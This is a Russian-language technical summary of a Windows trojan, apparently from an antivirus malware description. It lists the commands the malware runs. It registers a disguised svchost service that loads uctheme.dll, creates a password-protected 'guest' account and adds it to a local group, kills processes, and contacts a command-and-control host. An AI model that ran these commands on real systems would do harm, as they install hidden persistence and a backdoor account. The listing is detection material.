Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\NWCWorkstation] 'Start' = '00000002' (значение 2 — автоматический запуск службы при загрузке системы)
- <SYSTEM32>\sc.exe start NWCWorkstation
- <SYSTEM32>\reg.exe add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NWCWorkstation\Parameters /v ServiceMain /t REG_SZ /d FreeTest /f
- <SYSTEM32>\svchost.exe -k netsvcs
- <SYSTEM32>\taskkill.exe /F /IM <Имя вируса>.exe
- <SYSTEM32>\cmd.exe /c <Полный путь к вирусу>.bat
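- <SYSTEM32>\net1.exe localgroup %USERNAME%s guest /add (добавление учётной записи guest в локальную группу; «%USERNAME%s», по-видимому, результат автоматической подстановки имени пользователя в отчёте — вероятно, исходно это имя группы администраторов, требует проверки)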
- <SYSTEM32>\sc.exe create NWCWorkstation binpath= "<SYSTEM32>\svchost.exe -k netsvcs" displayname= "Themes Services Manager" start= auto
- <SYSTEM32>\expand.exe %WINDIR%\uctheme.tmp <SYSTEM32>\uctheme.dll
- <SYSTEM32>\net1.exe user guest fuck /add
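- <SYSTEM32>\reg.exe add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NWCWorkstation\Parameters /v ServiceDll /t REG_EXPAND_SZ /d <SYSTEM32>\uctheme.dll /f (параметр ServiceDll задаёт библиотеку, которую svchost.exe загружает как службу NWCWorkstation; при проверке системы стоит сверять это значение)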
- <SYSTEM32>\sc.exe description NWCWorkstation "Themes Services Manager"
- <Полный путь к вирусу>.bat
- <SYSTEM32>\uctheme.dll
- %WINDIR%\uctheme.tmp
- 'ww##.#aemae456.com':80
- DNS ASK ww##.#aemae456.com
- '<IP-адрес в локальной сети>':1036
- ClassName: '' WindowName: ''